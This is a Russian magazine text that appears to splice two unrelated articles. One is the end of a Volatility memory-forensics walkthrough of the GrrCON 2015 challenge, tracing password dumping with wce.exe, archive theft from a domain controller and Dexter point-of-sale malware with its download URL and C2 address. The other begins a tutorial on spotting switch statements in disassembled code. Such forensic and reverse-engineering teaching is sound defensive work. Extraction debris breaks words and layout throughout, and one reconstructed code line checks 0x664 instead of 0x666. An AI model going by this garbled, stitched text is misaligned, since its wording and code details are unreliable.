Получим­ первичную­ информацию­ об исследуемом­ образе­ .

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

imageinfo0

Информа­ ­ция об операци­ ­онной системе­

python2 vol.py -f /mnt/c/Users/DonNod/Downloads/c69-Grrcon2015/

target2/target2-6186fe9f.vmss --profile=Win7SP1x86_23418 printkey -K

"ControlSet001\Control\ComputerName\ComputerName"

Имя компьюте­ ­ра

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 printkey -K ControlSet001\Services\Tcpip\P

arameters\Interfaces{e29ac6c2-7037-11de-816d-806e6f6e6963}

IP-адрес хоста­

Профиль­ операци­ онной­ системы­ — Win7SP1x86_23418, IP-адрес хоста­ — 10.1.1.21, имя компьюте­ ра­ — GIDEON-PC. Теперь восста­ новим­ последова­ ­ тельность­ действий­ злоумыш­ ленни­ ка­ на скомпро­ мети­ рован­ ном­ компьюте­ ре­ . Для начала получим информацию­ из консоли­ .

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 consoles > c69-Grrcon2015/target2/

consoles0

Вывод­ плагина­ consoles

Злоумыш­ ­ленник загрузил­ утилиту­ wce.exe и получил пароли пользовате­ ­лей в системе­ . Посмотрим­ , что хранит­ ­ся в файле­ w.tmp. Для этого­ выгрузим­ его так же, как выгружали­ для хоста­ Target1.

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 filescan > c69-Grrcon2015/target2/

filescan0

Адрес­ файла­ w.tmp в исследуемом­ образе­ — 0x000000003fcf2798.

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fcf2798 -D c69-

Grrcon2015/target2/dumpfiles0

Содер­ жимое­ файла­ w.tmp

Мы определи­ ли­ пароль пользовате­ ля­ gideon — t76fRJhs.

Далее­ атакующий­ примон­ тировал­ системный­ диск контрол­ лера­ домена \\ 10.1.1.2\c$, используя­ пароль пользовате­ ля­ Administrator. Скопиро­ вал­ программу­ архивато­ ра­ rar.exe и создал­ на примон­ тирован­ ном­ диске­ папку­ crownjewels.

После­ этого­ злоумыш­ ­ленник заархивиро­ ­вал все файлы­ с расширени­ ­ем . txt на диске­ и задал пароль от архива­ 123qwe!@#. Архив получил имя crownjewlez.rar. Так как на исследуемом­ хосте­ архив не хранит­ ­ся и он открывал­ ­ся только­ из командной­ строки­ , то информацию­ о сжатых­ файлах­ можно­ поискать­ в памяти процес­ ­са. Получим дамп процес­ ­са и найдем­ в нем все файлы­ с расширени­ ­ем .txt.

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 pstree > c69-Grrcon2015/target2/pstree0

Дерево­ процес­ сов­

Сдампим­ адресное пространс­ тво­ процес­ са­ с идентифика­ тором­ 3048.

python2 vol.py -f /mnt/c/Users/DonNod/Downloads/c69-Grrcon2015/

target2/target2-6186fe9f.vmss --profile=Win7SP1x86_23418 memdump -p

3048 -D /mnt/c/Users/DonNod/Downloads/c69-Grrcon2015/target2/0

Выведем­ строки­ в полученном­ файле­ , но помним­ , что они в 16-битной­ кодировке­ .

strings -e l 3048.dmp | grep -i 3048.dmp0

Обнаружен­ ные­ файлы­ с расширени­ ем­ txt в дампе­ процес­ са­ Проана­ лизи­ руем­ Tasks Shedulers. Найдем­ файлы­ tasks и выгрузим­ их.

Обнаружен­ ный­ файл задачи At1

Адрес­ файла­ At1 — 0x000000003fc399b8.

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fc399b8 -D c69-

Grrcon2015/target2/dumpfiles0

Содер­ жимое­ задачи At1

С помощью планиров­ щика­ задач злоумыш­ ленник­ запустил­ скрипт 1.bat. Выг ­ рузим его, адрес файла­ в памяти — 0x000000003f427e50.

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003f427e50 -D c69-

Grrcon2015/target2/dumpfiles0

Содер­ жимое­ файла­ 1.bat

Скрипт 1.bat запускает­ утилиту­ wce.exe.

Мы проана­ лизи­ рова­ ли­ образ операци­ онной­ системы­ на компьюте­ ре­ Target2, восста­ нови­ ли­ действия­ злоумыш­ ленни­ ка­ . После­ компро­ мета­ ции­ сис ­ темы выгрузили­ файлы­ с расширени­ ем­ .txt на контрол­ лере­ домена 10.1.1. 2, сохранили­ в запаролен­ ный­ архив, а также­ получили­ пароль пользовате­ ля­

gideon.

АНАЛИЗ ХОСТА POS

Получим­ первичную­ информацию­ об исследуемой­ системе­ .

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss imageinfo

Профиль­ исследуемо­ ­го образа­

python2 vol.py -f c69-Grrcon2015/target2/target2-6186fe9f.vmss

--profile=Win7SP1x86_23418 printkey -K "ControlSet001\Services\Tcpip\

Parameters\Interfaces{e29ac6c2-7037-11de-816d-806e6f6e6963}"

IP-адрес хоста­

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss --profile

=Win7SP1x86_23418 printkey -K "ControlSet001\Control\ComputerName\C

omputerName"

Имя компьюте­ ра­

Профиль­ исследуемо­ го­ образа­ — Windows7SP1x86_23418, IP-адрес хоста­ —

10.1.1.10, имя компьюте­ ра­ — POS-01-PC.

Получим­ информацию­ обо всех запущенных­ процес­ ­сах и сетевой активности­ .

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss

--profile=Win7SP1x86_23418 pstree > c69-Grrcon2015/pos01/pstree0

Процесс­ iexplore.exe

Находим­ процесс­ iexplore.exe с идентифика­ ­тором 3208. Запустим­ плагин­ malfnd для поиска­ внедренно­ ­го в адресное пространс­ ­тво процес­ ­сов кода.

python2 vol.py -f /mnt/c/Users/Forensics/Downloads/c69-Grrcon2015/

pos01/POS-01-c4e8f786.vmss --profile=Win7SP1x86_23418 malfind > /mnt/

c/Users/Forensics/Downloads/c69-Grrcon2015/pos01/malfind0

Работа­ утилиты­ malfnd

Из рисунка­ выше видно­ , что в процес­ се­ iexplore.exe с идентифика­ тором­ 3208 обнаруже­ на­ область памяти с защитой на запись, чтение­ и выполнение­ , а также­ виден заголовок­ MZ (magic byte исполняемо­ го­ файла­ ). Мы на верном­ пути. Попробу­ ем­ выгрузить­ этот код с помощью плагина­ malfnd и найдем­ первичную­ информацию­ о вредоно­ се­ .

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss --profile

=Win7SP1x86_23418 malfind -p 3208 -D c69-Grrcon2015/pos01/0

Выясним­ MD5-хеш полученного­ файла­ :

491e1a4b51a09d234c9356822cf521a7 — и найдем­ его на VirusTotal.

Данный­ модуль относит­ ся­ к семейству­ вредоно­ сов­ Dexter. Найдем­ сетевое взаимо­ дей­ ствие­ с управляющим­ сервером­ .

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss

--profile=Win7SP1x86_2 3418 netscan > c69-Grrcon2015/pos01/netscan0

Сетевое­ взаимо­ дей­ ствие­ процес­ са­ iexplore.exe

Вредонос­ ­ный процесс­ установил­ соединение­ с управляющим­ сервером­ , имеющим­ IP-адрес 54.84.237.92, по порту­ 80.

Давай­ получим дамп адресного­ пространс­ ­тва процес­ ­са с идентифика­ ­ тором 3208 и вытащим все URL-адреса­ , для чего будем использовать­ утилиту­ bulk_extractor.

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss --profile

=Win7SP1x86_23418 memdump -p 3208 -D ./0

Мы получили­ файл 3208.dmp. Запустим­ утилиту­ bulk_extractor.

bulk_extractor 3208.dmp -o bulk_ex0

В каталоге­ bulk_ex хранит­ ся­ вся извлечен­ ная­ структуриро­ ван­ ная­ информа ­ ция, полученная­ из файла­ 3208.dmp. В файле­ url_histograms содержатся­

все домены, а также­ число­ обращений­ к ним.

Загрузка­ вредонос­ ного­ модуля

Модуль­ загружал­ ся­ с адреса­ http://54.84.237.92/allsafe_update.exe,

оригиналь­ ное­ имя файла­ — allsafe_update.exe. Также­ для поиска­ URL в файле­ 3208.dmp можно­ восполь­ зовать­ ся­ регулярным­ выражением­ /(

https?:\/\/)?([\w\.-]+)([\/\w \.-]*)/ и плагином­ yarascan.

python2 vol.py -f c69-Grrcon2015/pos01/POS-01-c4e8f786.vmss --profile

=Win7SP1x86_23418 yarascan -Y “/(https?:\/\/)?([\w\.-]+)([\/\w \.-]*

)/” -p 32080

Попробу­ ­ем найти­ все файлы­ с расширени­ ­ем .exe в адресном пространс­ ­тве дампа­ процес­ ­са. Откроем­ файл в hex-редакторе­ .

Обнаружен­ ные­ файлы­ с расширени­ ем­ exe

Специфич­ ­ное имя исполняемо­ го­ файла­ для Allsafecybersec — allsafe_protector.exe. Мы исследова­ ли­ образ оператив­ ной­ памяти хоста­ POS, обнаружи­ ли­ вредонос­ ный­ процесс­ с идентифика­ тором­ 3208, выявили­ сетевую активность с управляющим­ сервером­ 54.84.237.92. Загружен­ ный­ модуль относит­ ся­ к семейству­ вредонос­ ных­ программ­ Dexter.

ВЫВОДЫ

Итак, мы восста­ нови­

ли­ действия­

злоумыш­

ленни­

ков­ , проана­ лизи­

ровав­

обра ­

зы системной­

памяти Windows. С помощью фишингового­

сообщения­

, содер ­

жащего ссылку­ на обновления­

VPN-клиента­

, пользователь­

хоста­

загрузил­

вредонос­

ный­

файл и запустил­ его. На машину установил­

ся­ вредонос­

семей ­

ства XtremeRAT, с его помощью злоумыш­

ленни­

ки­ управляли­ скомпро­ мети­

­

рованной­

машиной.

Далее­

атакующие­

получили­

пароль

пользовате­

ля­

front-desk

и Administrator. Для закрепле­

ния­ в системе­

использовалась­

ветка­

реестра­

SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Компро­ мета­

ция­

сис ­

темы произош­

ла­ в 11:31:27 09.10.2015

UTC.

С помощью учетной­

записи

Administrator злоумыш­

ленник­

получил доступ­ к хостам­

GIDEON-PC и POS-

01-PC. На компьюте­ ре­ GIDEON-PC атакующий­

примон­ тировал­

системный­

диск

контрол­

лера­

домена 10.1.1.2\$c и выгрузил­

три файла­ с расширени­

ем­ .

txt. Далее атакующий­

получил доступ­ к компьюте­ ру­ POS-01-PC и загрузил­

на него малварь­

семейства­

Dexter.

В этой статье мы изучим­ оператор­ выбора switch. Давай

разберем­ ся­ , какие формы­ он может принять­ в двоичном­ коде, как разные­ компилято­ ры­ трансли­ руют­ его и как его найти­ в дизассем­ бли­ рован­ ном­ коде по характерным­ приз ­ накам.

Пятнадцать­ лет назад эпичес­ ­кий труд Криса­ Каспер­ ­ски «Фундамен­ ­таль­ные основы­ хакерства­ » был настоль­ ­ной книгой­ каждого­ начинающе­ ­го исследова­ ­ теля в области компьютер­ ­ной безопасности­ . Однако­ время­ идет, и знания­ , опубликован­ ­ные Крисом­ , теряют­ актуаль­ ­ность. Редакторы­ «Хакера» попыта ­ лись обновить­ этот объемный­ труд и перенести­ его из времен­ Windows 2000 и Visual Studio 6.0 во времена­ Windows 10 и Visual Studio 2019.

Ссылки­ на другие­ статьи из этого­ цикла­ ищи на странице­ автора­ .

ИЩЕМ ОПЕРАТОРЫ SWITCH — CASE — BREAK В БИНАРНОМ КОДЕ

Для улучшения­ читабельнос­ ти­ программ­ в язык C был введен­ оператор­ мно ­ жествен­ ного­ выбора — switch. В Delphi с той же самой задачей справляет­ ся­ оператор­ CASE, более гибкий­ , чем его C-аналог­ , но об их различи­ ях­ мы поговорим­ позднее­ .

Легко­ показать, что switch эквивален­ ­тен такой конструк­ ­ции:

IF (a == x1) THEN оператор­				10
«ELSE IF (a == X2) THEN оператор­							20
IF (a == X2) THEN оператор­					20			»
IF (a == X2) THEN оператор­					20
ELSE ... оператор­			по умолчанию­
Если­ изобразить­		это ветвле­ ние­				в виде логического­		дерева, то образует­	ся­
характерная­	«косичка­ ».

Трансля­ ция­ операто­ ра­ switch в общем случае­

Казалось­ бы, идентифици­ ­ровать switch никакого­ труда­ не составит­ — даже не строя дерева, невозможно­ не обратить­ внимание­ на длинную­ цепочку­ гнезд, проверя­ ­ющих истинность условия­ равенства­ некоторой­ переменной­ с серией­ непосредс­ ­твен­ных значений­ (сравнения­ переменной­ с другой­ переменной­ оператор­ switch не допускает­ ).

Однако­ в реальной­ жизни­ все происхо­ ­дит совсем­ не так. Компилято­ ­ры (даже неоптимизи­ ­рующие) трансли­ ­руют switch в настоящий­ «мясной­ рулет», доверху­ нашпигован­ ­ный всевоз­ ­можны­ми операци­ ­ями отношений­ . Давай откомпилиру­ ­ем следующий­ код компилято­ ­ром Microsoft Visual C++ 2022:

#include <stdio.h>

int main()

{

int a = 0x666;

switch (a)

{

case 0:

printf("a == 0");

break;

case 1:

printf("a == 1");

break;

case 2:

printf("a == 2");

break;

case 0x666:

printf("a == 666h");

break;

default:

printf("Default");

}

}

Вывод­ приложе­ ния­ switch_cases

Теперь­ посмотрим­ в IDA на результат­ дизассем­ бли­ рова­ ния­ .

Дерево­ распусти­ ло­ ветки­ во все стороны­ . Можно­ сделать­ однозначный­ вывод: в дизассем­ бли­ руемой­ программе­ присутс­ тву­ ет­ оператор­ мно­ жествен­ ного­ выбора switch-case

main	proc near ; CODE XREF: __scrt_common_main_seh+107↓p

;DATA XREF: .pdata:0000000140004018↓o

;Объявляем две локальные переменные,

;но почему две, если в исходном коде объявлена только одна?

var_18	=	dword	ptr	-18h
var_14	=	dword	ptr	-14h
; Резервируем место для			локальных переменных
	sub		rsp, 38h

;Инициализируем локальные переменные:

;var_14 присваиваем значение 0х666, следовательно, это переменная a

mov

[rsp+38h+var_14], 666h

mov

eax, [rsp+38h+var_14]

Перемен­

ной­

var_18 присваиваем­

это же значение­

. Обрати­ внимание­

:

ее

создает­

оператор­

switch для собствен­

ных­

нужд. Значит­ , мы определи­

ли­ ,

для чего в программе­

объявле­

на­ вторая­

локальная­

переменная­ ! Она нужна­

для хранения­

первоначаль­

ного­

значения­

. Таким образом­ , даже если зна ­

чение сравнива­

емой­

переменной­

var_14 в каком то ответвле­ нии­

CASE будет

изменено­

, это не повлияет­

на

результат­

выборов, посколь­

ку­ значение­

переменной­ var_18 не поменяется­

!

mov

[rsp+38h+var_18], eax

; Сравниваем значение var_18 с нулем

cmp

[rsp+38h+var_18], 0

;Если сравнение успешно, переходим в блок кода, выводящий в консоль

"a == 0"

;Этот код получен трансляцией ветки case 0: printf("a == 0");

;Иначе продолжаем выполнение

jz	short loc_140001115
; Сравниваем значение var_18 с 1
cmp	[rsp+38h+var_18], 1

;В случае успеха прыгаем внутрь блока кода для вывода "a == 1"

;Этот код получен трансляцией ветки case 1: printf("a == 1");

;Иначе продолжаем выполнение

jz	short loc_140001123
; Сравниваем значение var_18 с 2
cmp	[rsp+38h+var_18], 2

;В случае равенства выводим "a == 2"

;Этот код получен трансляцией ветки case 2: printf("a == 2");

;Иначе продолжаем выполнение

jz	short loc_140001131
; Сравниваем var_18	и 0x666
cmp	[rsp+38h+var_18], 666h

;Если равно, выводим "a == 666h"

;Этот код получен трансляцией ветки case 0x666: printf("a == 666h");

jz	short loc_14000113F

Если­ мы досюда добрались­ , значит­ , ни одно условие­ не сработа­ ­ло, поэтому­ выполняем­ дефолтное­ действие­ : делаем­ безусловный­ переход в блок кода для вывода строчки­ Default.

Этот код получен трансля­ ­цией ветки­ default: printf("Default");:

jmp	short loc_14000114D
; ------------------------------------------------
loc_140001115:		;	CODE XREF: main+19↑j
; printf("a == 0");
lea	rcx, _Format	;	"a == 0"
call	printf

А вот этот безусловный­ переход, выносящий­ управление­ за пределы­ switch — в конец программы­ , есть оператор­ break, находящий­ ­ся в конце­ каждой­ ветки­ . Если бы его не было, то начали бы выполнять­ ­ся все остальные­

ветки­ case, независимо­			от того, к какому значению­		var_18 они принад­ лежат­	!
		jmp	short loc_140001159 ; break
	; ------------------------------------------------
	loc_140001123:			; CODE XREF: main+20↑j
	; printf("a == 1");
		lea	rcx, aA1	; "a == 1"
		call	printf
		jmp	short loc_140001159 ; break
	; ------------------------------------------------
	loc_140001131:			; CODE XREF: main+27↑j
	; printf("a == 2");
		lea	rcx, aA2	; "a == 2"
		call	printf
		jmp	short loc_140001159 ; break
	; ------------------------------------------------
	loc_14000113F:			; CODE XREF: main+31↑j
	; printf("a == 666h");
		lea	rcx, aA666h	; "a == 666h"
		call	printf
		jmp	short loc_140001159 ; break
	; ------------------------------------------------
	loc_14000114D:			; CODE XREF: main+33↑j
	; printf("Default");
		lea	rcx, aDefault	; "Default"
		call	printf
	loc_140001159: ; Конец SWITCH			; CODE XREF: main+41↑j
				; main+4F↑j ...
	; Возвращаем 0
		xor	eax, eax
	; Восстанавливаем стек
		add	rsp, 38h
		retn
	main	endp

Выглядит­ довольно­ прямоли­ ­ней­но. Дизассем­ ­блер­ный листинг­ можно­ условно разделить­ на две части­ : первая­ часть — сам оператор­ выбора, откуда­ каждое­ условие­ передает­ управление­ во вторую­ часть — конкрет­ ­ную ветку­ , соответс­ ­ твующую­ этому­ условию­ .

Для сравнения­ взглянем­ , какой код постро­ ­ит C++Builder 10 на основе­ этой же программы­ :

public main

main

proc near ;

DATA XREF: __acrtused+29↑o

; Как много локальных переменных!

var_38

= dword

ptr

-38h

var_34

= dword

ptr

-34h

var_30

= dword

ptr

-30h

var_2C

= dword

ptr

-2Ch

var_28

= dword

ptr

-28h

var_24

= dword

ptr

-24h

var_20

= dword

ptr

-20h

var_1C

= dword

ptr

-1Ch

var_18

= dword

ptr

-18h

var_14

= dword

ptr

-14h

var_10

= qword

ptr

-10h

var_8

= dword

ptr

-8

var_4

= dword

ptr

-4

; Открываем кадр стека

push

rbp

; Резервируем место для

локальных переменных

sub

rsp, 60h

; В RBP сохраняем указатель

на дно стека

lea

rbp, [rsp+60h]

; Инициализируем локальные переменные:

mov

[rbp+var_4], 0

mov

[rbp+var_8], ecx

mov

[rbp+var_10], rdx

; var_14 присваиваем значение 0х666, следовательно, это переменная a

mov

[rbp+var_14], 666h

; В ECX помещаем значение var_14

mov

ecx, [rbp+var_14]

; Следующим элегантным образом сравниваем значение var_14 с нулем

test

ecx, ecx

Коман­ ­да TEST не меняет­ значение­

операн­ ­дов, поэтому­

присваиваем­

переменной­

var_18 значение­

0х666. Выходит, var_18 — автомати­

­чес­кая

переменная­ , созданная­

switch для своей­ работы, чтобы­ при изменении­

var_14 внутри­ какой либо ветки­ кода это не повлияло­

на дальнейший­

выбор

пути выполнения­

.

mov

[rbp+var_18], ecx

Совер­ шаем­

прыжок­

следующей­

командой­

только­

в

том

случае­ ,

когда­

в результате­

выполнения­

предыду­

щего­

сравнения­

флаг ZF стал равен еди ­

нице, а это могло­ произой­

ти­ , только­ когда­ операнд­

равен нулю. Но в рас ­

сматрива­

емом­

примере­

это не так, поэтому­ пропус­ каем­

прыжок­ .

jz

short

loc_401454

Судя­ по месту­ назначения­

этого­ перехода­ , код получен трансля­ цией­

ветки­

case 0: printf("a == 0");.

По идее, от следующей­

инструк­ ции­

можно­ избавить­

ся­ . Напрасно­

ком ­

пилятор ее вставил­ , посколь­

ку­ она ничего полезного­

не делает­ , а только­

занимает­ место­ . Посуди сам: $ указыва­

ет­ на текущую позицию в программе­

,

а команда­ jmp занимает­ два байта­ — получается­

, она только­ переводит­

выполнение­

через себя.

jmp

short

$+2

;------------------------------------------------

loc_40142B: ; CODE XREF: main+29↑j

;В var_18 находится число 0х666, помещаем его в EAX

mov	eax, [rbp+var_18]

;Уменьшаем EAX на единицу! Что это может значить?

;Никакого вычитания в нашей программе не было!

sub eax, 1

; Сохраняем значение разности в переменной var_1C

mov [rbp+var_1C], eax

Совер­ ­шаем следующий­ переход на основе­ флага­ , если ZF == 1, но кто же его установил­ ? Вспомина­ ­ем: SUB — та же CMP, только­ изменяющая­ значение­ операн­ ­да приемни­ ­ка. Другими­ словами­ , в него помещается­ разность­ . Но в нашем случае­ ZF не равен единице­ , так как результат­ вычитания­ не равен нулю. Выходит, этот код получен трансля­ ­цией ветки­ case 1: printf("a == 1"), что подтвержда­ ­ет просмотр­ области, куда указыва­ ­ет переход.

Таким­ образом­ , данная­ конструк­ ­ция просто­ завуали­ ­рован­ная провер­ ­ка EAX на равенство­ нулю! Ох и хитрый­ же этот C++Builder-компилятор­ !

jz short loc_401465

; Делаем принудительный шаг вперед, хотя можно было бы обойтись без

дополнительной команды

jmp	short $+2
; ------------------------------------------------
loc_401438:	; CODE XREF: main+36↑j

; В var_18	находится число 0х666, помещаем его в EAX для выполнения
дальнейших	вычислений
	mov	eax, [rbp+var_18]

Вычита­	ем­ из значения­		var_18 2, иными­ словами­				, исходя­ из нашего анализа­
выше, сравнива­		ем­ значение­			переменной­	var_18 с числом­		2. Выходит, этот
код получен трансля­ цией­				ветки­ case 2: printf("a == 2").
	sub		eax, 2
	mov		[rbp+var_20], eax

Переход­ выполняет­ ся­ , если установ­ лен­ флаг нуля. А он будет установ­ лен­ , ког ­ да после­ вычитания­ двойки­ командой­ SUB в EAX останет­ ся­ ноль, то есть исходное значение­ EAX должно­ быть равно­ двум. Но этого­ не случилось­ . Поэтому­ продол­ жаем­ выполнение­ .

jz	short	loc_401476
jmp	short	$+2
; ------------------------------------------------
loc_401445:		; CODE XREF: main+43↑j
mov	eax, [rbp+var_18]

Сравнива­ ем­ неизменную­ var_18 с 0x666. Бинго­ ! После­ вычитания­ получился­ ноль! Следова­ тель­ но­ , возводим­ флаг ZF.

sub	eax, 666h
mov	[rbp+var_24], eax

Так как флаг ZF равен единице­ , совершаем­ переход к ветке­ loc_401487, где происхо­ ­дит вывод строки­ "a == 666h". Значит­ , этот код получен после­ тран ­

сляции­ ветки­ case 0x666: printf("a == 666h");.

jz	short loc_401487

Если­ бы предыду­ щий­ переход не был выполнен­ , то с помощью следующе­ го­ безусловно­ го­ перехода­ мы бы сделали­ прыжок­ на ветку­ Default.

	jmp	short loc_401498
; ------------------------------------------------
; Сами ветки
loc_401454:			;	CODE XREF: main+27↑j
; printf("a == 0");
	lea	rcx, aA0	;	"a == 0"
	call	printf
	mov	[rbp+var_28], eax
	jmp	short loc_4014A7 ; break
; ------------------------------------------------
loc_401465:			;	CODE XREF: main+34↑j
; printf("a == 1");
	lea	rcx, aA1	;	"a == 1"
	call	printf
	mov	[rbp+var_2C], eax
	jmp	short loc_4014A7 ; break
; ------------------------------------------------
loc_401476:			;	CODE XREF: main+41↑j
; printf("a == 2");
	lea	rcx, aA2	;	"a == 2"
	call	printf
	mov	[rbp+var_30], eax
	jmp	short loc_4014A7 ; break
; ------------------------------------------------
loc_401487:			;	CODE XREF: main+50↑j
; printf("a == 666h");
	lea	rcx, aA666h	;	"a == 666h"
	call	printf
	mov	[rbp+var_34], eax
	jmp	short loc_4014A7 ; break
; ------------------------------------------------
loc_401498:			;	CODE XREF: main+52↑j
; printf("Default");
	lea	rcx, aDefault	;	"Default"
	call	printf
	mov	[rbp+var_38], eax
loc_4014A7: ; конец switch			;	CODE XREF: main+63↑j
			;	main+74↑j ...
; Возвращаем 0
	mov	[rbp+var_4], 0
	mov	eax, [rbp+var_4]
; Восстанавливаем стек
	add	rsp, 60h
; Закрываем кадр стека
	pop	rbp
	retn
main	endp

C++Builder проявил­ большую­ креатив­ ­ность. Сравнил­ переменную­ с нулем он при помощи инструк­ ­ции TEST, а для всех остальных­ случаев­ вместо­ инструк­ ­ ции CMP, как это сделал­ Visual C++, C++Builder восполь­ ­зовал­ся командой­ вычитания­ SUB. Оптимиза­ ­тор на основе­ своих­ глубин­ ­ных знаний­ посчитал­ , что такой код будет быстрее­ выполнять­ ­ся!

Вот только­ нам, хакерам, от этого­ решения ничуть не легче­ . Ведь прямая­ ретран­ ­сля­ция кода дает конструк­ ­цию вроде­

if (a == 0) printf("a == 0"); else

if (a == 1) printf("a == 1"); else

if (a == 2) printf("a == 2"); else

if (a == 0x664) printf("a == 666h"); else

printf("Default");

В ней совсем­

не угадыва­

ется­

оператор­

switch! Впрочем­ , почему это не уга ­

дывается­

? Угадыва­

ется­

, еще как! Где есть длинная­

цепочка­ IF

—

THEN

—

ELSE — IF — THEN

—

ELSE…,

там и до switch недалеко­ !

Узнать оператор­

множес­ твен­

ного­

выбора будет еще легче­ , если изобразить­

его в виде

логического­

дерева.

Другая­

характерная­

деталь — case-обработ­ чики­

, точнее­

оператор­

break,

традици­

онно­

замыкающий­

каждый­

из них. Они то и образуют­

правую­

полови ­

ну «косички­ », сходясь­

все вместе­ в точке­ Z. Правда­ , многие­ программис­

ты­

питают­ патологичес­

кую­

любовь к case-обработ­ чикам­

размером­

в два три

экрана­ , включая­ в них, помимо всего­ прочего­

, и циклы­ , и ветвле­ ния­ , и даже

вложен­ ные­

операто­

ры­ множес­ твен­

ного­

выбора! В результате­

правая­

часть

«косички­ » превраща­

ется­

в непроходи­

мый­

таежный­

лес, сквозь

который

не проберет­

ся­ и стадо­ слонопо­

тамов­

. Но даже если и так, левая часть «косич ­

ки» все равно­ останет­ ся­ достаточ­

но­ простой­ и легко­ распозна­

ваемой­

.

В более сложных­ деревьях­ , имеющих­

большее­

количество­ условий­ — нес ­

колько­ десятков­ или сотен (как мы знаем­ , программис­

ты­ любят нашпиговы­

­

вать операто­

ры­ switch условиями­

), компилятор­

может вставить­

допол ­

нительное­

условие­ , которого­ не было в исходной программе­

. Зачем же он

занимается­

такой самодеятель­

ностью­

?

Когда­ в программе­

много­ условий­ , процес­ сор­

совсем­

запаривает­

ся­ про ­

верять их все (а по закону подлости­

нужный­

case будет в самом конце­ ).

Поэтому­ компилятор­

с помощью дополнитель­

ного­

условия­ разделя­

ет­ дерево

на два или большее­

количество­

в зависимос­ ти­ от добавленных­

условий­ ,

уменьшая­

его высоту. Вместо­ одной ветви­ трансля­ тор­ постро­ ит­ две, помес ­

тив в левую часть только­ числа­ , меньшие­

определен­

ного­

значения­

, а в пра ­

вую — все остальные­ . Благода­

ря­ этому­ условия­

из конца­ дерева будут

перенесены­

в его начало. Данный­

метод оптимиза­

ции­

поиска­

значений­

называют­ методом вилки­ , но не будем сейчас­ на нем останав­ ливать­

ся­ , а луч ­

ше разберем­

его в разделе­

«Обрезка длинных­ деревьев­ ».

Изменение­

порядка­ сравнений­

— право­ компилято­

ра­ . Стандарт­

ничего

об этом не говорит, и каждая­

реализация­

вольна­ поступать­

так, как ей заб ­

лагорассудит­

ся­ . Другое­ дело — case-обработ­ чики­

(то есть тот код, которому­

case передает­ управление­

в случае­

истинности­ отношения­

). Они обязаны­

располагать­

ся­ так, как были объявле­

ны­ в программе­

,

посколь­

ку­ при отсутс ­

твии закрыва­

юще­

го­

операто­

ра­ break они

должны­

выполнять­

ся­

строго­

в задуманном­

программис­

том­

порядке­ , хотя эта возможность­

языка­ C

использует­ ся­ крайне­ редко­ .

Таким­ образом­ , идентифика­

ция­ операто­

ра­ switch не сильно­ усложняется­

:

если после­ уничтожения­

узлового­

гнезда­ и привив­ ки­ правой­

ветки­ к левой

(или наоборот­ ) мы получаем­ эквивален­

тное­

дерево и это дерево образует­

характерную­

«косичку­ », мы имеем­

дело с операто­

ром­

множес­ твен­

ного­

выбора или его аналогом­

.